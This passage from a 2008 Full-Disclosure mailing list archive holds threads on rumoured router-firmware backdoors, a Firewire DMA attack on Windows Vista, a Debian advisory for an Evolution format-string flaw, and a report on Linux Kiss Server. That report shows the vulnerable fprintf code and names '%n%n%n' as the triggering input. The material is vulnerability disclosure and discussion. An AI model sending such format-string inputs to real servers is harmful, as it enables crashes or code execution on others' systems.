a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
Why stop at routers switches? You could own far more devices by backdooring BIOS', HDD's, etc, all of which are often produced in Far East countries. On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: | Next we'll be seeing Japanese tactical nukes Hidden in Toyota | trunks | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ http://security.eweek.com/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/Contributing | Contributing Editor, PC Magazine | [EMAIL PROTECTED] | | | | | | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
I dont think they have http://www.hqlaptops.com/hard-drives/infected-seagate-hard-drives http://www.taipeitimes.com/News/taiwan/archives/2007/11/11/2003387202 On Thu, Mar 6, 2008 at 1:28 PM, quispiam lepidus [EMAIL PROTECTED] wrote: Why stop at routers switches? You could own far more devices by backdooring BIOS', HDD's, etc, all of which are often produced in Far East countries. On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: | Next we'll be seeing Japanese tactical nukes Hidden in Toyota | trunks | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ http://security.eweek.com/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/ | http://blogs.pcmag.com/securitywatch/Contributing | Contributing Editor, PC Magazine | [EMAIL PROTECTED] | | | | | | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greetings. I agree, that the threat does not stop at firmware for routers and switches. Even with open source, or dare i type, even more so with open source, the threat for maliciously modified code exists. This is not a new threat, per se, however, it is a growing threat which is fed by more and more hardware being built/assembled/manufactured/what-have-you in questionable countries/locations. This is not isolated to the far east, though the far east is a perfectly legitimate location for western users to NOT trust. I would venture to state that eastern users have already accepted that their products may have gone 1984 on them. It does not give me warm fuzzies that the way the vast majority of production appears, at least one part of most gizmos comes through the far east. Without question, a security concern. .te quispiam lepidus wrote: | Why stop at routers switches? You could own far more devices by | backdooring BIOS', HDD's, etc, all of which are often produced in Far East | countries. | | | On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy [EMAIL PROTECTED] wrote: | | Greets. | | It does not matter so much if there is no hard proof about the router | firmware containing backdoors set in place by Chinese manufacturers. | ~From a security perspective, it is a potential threat which should be | addressed, especially for western networks and those they trust. | | It is not too far fetched of an idea. Google yielded the following | fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml | | If you want to be inundated with reading material on the matter, be | creative, or not too creative, with Google searches having to do with | China and western powers and businesses, specific to information warfare. | | .te | | | Larry Seltzer wrote: | | Next we'll be seeing Japanese tactical nukes Hidden in Toyota | | trunks | | | | And who knows what the French are putting in that cheese. | | Larry Seltzer | | eWEEK.com Security Center Editor | | http://security.eweek.com/ http://security.eweek.com/ | | http://blogs.pcmag.com/securitywatch/ | | http://blogs.pcmag.com/securitywatch/ | | http://blogs.pcmag.com/securitywatch/Contributing | | Contributing Editor, PC Magazine | | [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPXWkACgkQVuM8PD1UnspGaACeIRRRYubyJOSXuWSwQdoLyqlJ A1EAnAtBAlGyGIXOMk3OyEcHhpRi+hdN =jaFt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firewire Attack on Windows Vista
I believe their work is an expansion of this: http://www.theage.com.au/news/security/hack-into-a-windows-pc-no-password-needed/2008/03/04/1204402423638.html, which demonstrated the vuln. in XP (and, according to the paper, it's been demonstrated with other OS's as well), and their work was specifically done on showing the problem in Vista, which hadn't (as far as the paper writer seems to know) been done before. Maus On Wed, Mar 5, 2008 at 4:30 PM, Roger A. Grimes [EMAIL PROTECTED] wrote: As somewhat indicated in the paper itself, these types of physical DMA attacks are possible against any PC-based OS, not just Windows. If that's true, why is the paper titled around Windows Vista? I guess it makes headlines faster. But isn't as important, if not more important, to say all PC-based systems have the same underlying problem? That it's a broader problem needing a broader solution, instead of picking on one OS vendor to get headlines? [Disclaimer: I'm a full-time Microsoft employee.] Roger * *Roger A. Grimes, InfoWorld, Security Columnist *CPA, CISSP, CISA, MCSE: Security (2000/2003), CEH, yada...yada... *email: [EMAIL PROTECTED] or [EMAIL PROTECTED] *Author of Windows Vista Security: Securing Vista Against Malicious Attacks (Wiley) * http://www.amazon.com/Windows-Vista-Security-Securing-Malicious/dp/0470101555 * -Original Message- From: Bernhard Mueller [mailto:[EMAIL PROTECTED] Sent: Wednesday, March 05, 2008 10:54 AM To: Full Disclosure; Bugtraq Subject: Firewire Attack on Windows Vista Hello, In the light of recent discussions about firewire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the firewire unlock attack (as implemented in Adam Boileau´s winlockpwn) can be used against Windows Vista. The paper is available at: http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf Best regards, Bernhard -- _ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile+43 676 840301 718 email [EMAIL PROTECTED] Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt Advisor for your information security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1512-1] New evolution packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1512-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst March 05, 2008http://www.debian.org/security/faq - Package: evolution Vulnerability : format string attack Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0072 Ulf Härnhammar discovered that Evolution, the e-mail and groupware suite, had a format string vulnerability in the parsing of encrypted mail messages. If the user opened a specially crafted email message, code execution was possible. For the stable distribution (etch), this problem has been fixed in version 2.6.3-6etch2. For the old stable distribution (sarge), this problem has been fixed in version 2.0.4-2sarge3. Some architectures have not yet completed building the updated package for sarge at this time, they will be added as they come available. For the unstable distribution (sid), this problem has been fixed in version 2.12.3-1.1. We recommend that you upgrade your evolution package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.diff.gz Size/MD5 checksum: 294256 892634ed1c28416dea721a0ee1374d84 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3.dsc Size/MD5 checksum: 1459 e4a9b6f334108cae7550c9a0953e8e2b http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4.orig.tar.gz Size/MD5 checksum: 20968383 d555a0b1d56f0f0b9c33c35b057f73e6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_amd64.deb Size/MD5 checksum: 160454 b6f68df817e14a3c52422e4f0e810bd3 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_amd64.deb Size/MD5 checksum: 10447584 94e37843d38106635045906d58bd9386 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_hppa.deb Size/MD5 checksum: 160482 947be2b50da1219d1cbcf9dab63b2280 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_hppa.deb Size/MD5 checksum: 10596054 be4f110f1d50077b53e013d2824cc1d4 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_i386.deb Size/MD5 checksum: 160482 5b6f5d955d309e47fea09e97b24d7d58 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_i386.deb Size/MD5 checksum: 10228974 6c38e3e691756beccd1ccfdba259d2a8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_ia64.deb Size/MD5 checksum: 11419604 c99bb84c7a074900400e59de2b10dcce http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_ia64.deb Size/MD5 checksum: 160440 8887e35cc887febad15f9b6cf08694fe powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_powerpc.deb Size/MD5 checksum: 160488 6c9a8ba39a6bab1a47dd1da8e99a5205 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_powerpc.deb Size/MD5 checksum: 10286504 7f5d4b747a51e9c72d1114f9bcf6a209 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/e/evolution/evolution-dev_2.0.4-2sarge3_s390.deb Size/MD5 checksum: 160438 a6e0c9b90c90b6815fd607899aeb7583 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.0.4-2sarge3_s390.deb Size/MD5 checksum: 10638988 f10525a9b20cc799c0e000c3e81738ab Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3.orig.tar.gz Size/MD5 checksum: 17176288 7af880364d53b18ba72b1f85f3813c81 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.dsc Size/MD5 checksum: 2269 25a2e18e12a838535c3fd74525696fa0 http://security.debian.org/pool/updates/main/e/evolution/evolution_2.6.3-6etch2.diff.gz Size/MD5 checksum:37993 5f7815f2c6a24f3a0c940d773cca8fb1 Architecture independent packages:
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Quoting PC Pro article: SecureTest believes spyware could be easily built into Asian-manufactured devices such as switches and routers, providing a simple backdoor for companies or governments in the Far East to listen in on communications. It seems someone in this security company read Breakpoint, by Richard A. Clarke, stole his thoughts and is making claims without any proof products were actually backdoored just to gain some media attention. - -- Julio Cesar Fort Recife, PE, Brazil www.rfdslabs.com.br - computers, sex, human mind, music and more. PGP public key: http://www.rootshell.be/~sandimas/juliocesarfort.gpg -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHz1W9ySo2QtzTl10RAiRSAJwNx65oWpGDRZ4sMazHm14wrM3/dgCeLzGt Z0o6vSOdqbis9kLkM8Bce4s= =cnbG -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
Come on, where are the evidences? Sounds pretty much like racialism. Usually the engineers are having a hard time on even getting the routers and switches functional for mass market; there won't be any time left for them to plant well hidden backdoors. On Thu, Mar 6, 2008 at 7:09 AM, Ivan . [EMAIL PROTECTED] wrote: http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Houston, we have a problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: Come on, where are the evidences? Sounds pretty much like racialism. Usually the engineers are having a hard time on even getting the routers and switches functional for mass market; there won't be any time left for them to plant well hidden backdoors. But that's the proof right there - the reason *why* they have so much trouble getting the damned things to work is because they have to work around the backdoors in the device... ;) pgpv7tEvWbD76.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: Come on, where are the evidences? Sounds pretty much like racialism. Usually the engineers are having a hard time on even getting the routers and switches functional for mass market; there won't be any time left for them to plant well hidden backdoors. But that's the proof right there - the reason *why* they have so much trouble getting the damned things to work is because they have to work around the backdoors in the device... ;) Before we blow this off with a good laugh we should all remember the back doors in other network gear. Even so-called core equipment (anyone remember the backdoor into the [Nortel] Shasta (later known as BSN 5000)? Assuming that any unaudited gear has a backdoor is just common sense. -- Yours, J.A. Terranson sysadmin_at_mfn.org 0xpgp_key_mgmt_is_broken-dont_bother What religion, please tell me, tells you as a follower of that religion to occupy another country and kill its people? Please tell me. Does Christianity tell its followers to do that? Judaism, for that matter? Islam, for that matter? What prophet tells you to send 160,000 troops to another country, kill men, women, and children? You just can't wear your religion on your sleeve or just go to church. You should be truthfully religious. Mahmoud Ahmadinejad ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese backdoors hidden in router firmware
OK, only if hidden backdoors are also part of their function specs... I have friends in a router manufacturer. Besides basic functionalities that a router must have, they usually have to deal with some ridiculous requirements from customers. Mmmm, I also start to suspect the customers *want* their backdoors ;-) On Thu, Mar 6, 2008 at 12:28 PM, [EMAIL PROTECTED] wrote: On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said: Come on, where are the evidences? Sounds pretty much like racialism. Usually the engineers are having a hard time on even getting the routers and switches functional for mass market; there won't be any time left for them to plant well hidden backdoors. But that's the proof right there - the reason *why* they have so much trouble getting the damned things to work is because they have to work around the backdoors in the device... ;) -- Houston, we have a problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firewire Attack on Windows Vista
On Thu, 6 Mar 2008, Roger A. Grimes wrote: As somewhat indicated in the paper itself, these types of physical DMA attacks are possible against any PC-based OS, not just Windows. If that's true, why is the paper titled around Windows Vista? I guess it makes headlines faster. But isn't as important, if not more important, to say all PC-based systems have the same underlying problem? That it's a broader problem needing a broader solution, instead of picking on one OS vendor to get headlines? Well it IS a new kid on the block, other systems have already had this problem reported.. It would certainly be more interesting if Vista wasn't vulnerable though :) That said, according to the fwohci source in FreeBSD you have to explicitly enable this feature and the fwohci man page says it is mandatory for SBP. It would not be too difficult to disable it by default unless and SBP device is in use. Even in that case it is apparently possible to limit the access granted to a particular device (eg only allow it for the places you expect the device to write to). -- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au The nice thing about standards is that there are so many of them to choose from. -- Andrew Tanenbaum GPG Fingerprint - 5596 B766 97C0 0E94 4347 295E E593 DC20 7B3F CE8C signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firewire Attack on Windows Vista
On Wed, Mar 05, 2008 at 04:30:35PM -0500, Roger A. Grimes wrote: As somewhat indicated in the paper itself, these types of physical DMA attacks are possible against any PC-based OS, not just Windows. If that's true, why is the paper titled around Windows Vista? I guess it makes headlines faster. But isn't as important, if not more important, to say all PC-based systems have the same underlying problem? That it's a broader problem needing a broader solution, instead of picking on one OS vendor to get headlines? Roger, you should note that Adam's Hit by a Bus paper includes information about how Linux users can load their OS' Firewire driver in a way that should disallow physical memory DMA access, and close this attack vector. I have not yet seen anyone explain how to do the same in Windows. If there is no such option in Windows (as the Panholzer paper claims), then Microsoft deserves the negative attention. [Disclaimer: I'm a full-time Microsoft employee.] As for broader solutions, Microsoft is in an excellent position to help improve the situation -- maybe you could shed some light on their efforts? -Peter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2
Why isn't there a patch?
From: [EMAIL PROTECTED]
Site: http://www.vashnukad.com
Application: Linux Kiss Server v1.2
Type: Format strings
Priority: Medium
Patch available: No
The Linux Kiss Server contains a format strings vulnerability that, if run
in foreground mode, can be leveraged for access. The vulnerability is
demonstrated in the code below:
Function log_message():
if(background_mode == 0)
{
if(type == 'l')
fprintf(stdout,log_msg);
if(type == 'e')
fprintf(stderr,log_msg);
free(log_msg);
}
Function kiss_parse_cmd():
/* check full command name */
if (strncmp(cmd, buf, cmd_len))
{
asprintf(log_msg,unknow command: `%s', buf);
log_message(log_msg,'e');
goto error;
}
buf += cmd_len;
So putting something like %n%n%n in 'buf' you can trigger the vulnerability.
--
Name: Vashnukad
E-mail: [EMAIL PROTECTED]
Site: http://www.vashnukad.com
--
Name: Vashnukad
e-mail: [EMAIL PROTECTED]
Site: http://www.vashnukad.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firewire Attack on Windows Vista
Salut, Roger, On Wed, 5 Mar 2008 16:30:35 -0500, Roger A. Grimes wrote: As somewhat indicated in the paper itself, these types of physical DMA attacks are possible against any PC-based OS, not just Windows. If that's true, why is the paper titled around Windows Vista? That's very easy: because the specific attack was against Windows Vista's activation mechanism. The deficiencies of Firewire with regard to direct memory access have been known for quite a while now. The purpose of the referenced attack was specific to Windows Vista. It is of course also possible though to steal GnuPG keys from the memory of a Solaris machine, of course, that's in the nature of the beast, but this is not relevant to the specific attack mentioned here. May I also add that I am actually aware of patches from vendors which can render this attack ineffective for most other OSes (Solaris, Linux, etc.) - as far as I know, though, there is no such patch for Windows? That might also be a reason why this attack was created and published in the first place - like I said, the attack vector has been known for ages now. [Disclaimer: I'm a full-time Microsoft employee.] Hi there. ;-) Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33Güterstrasse 86 Fax:+41 61 383 14 674053 Basel Web:www.sygroup.ch [EMAIL PROTECTED] signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Goolag Perk and Annoyance
Within most corporate networks, what effective methods can be used, from the network's perspective, to block mass Google queries? Probably you are best with some kind of ratelimiting and/or content inspection of http traffic. Probably some payload injection in the flow and blocking the user based on your statisticals ... .te ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- BOFH excuse #218: The UPS doesn't have a battery backup. -- Regards Vladimir Vitkov signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
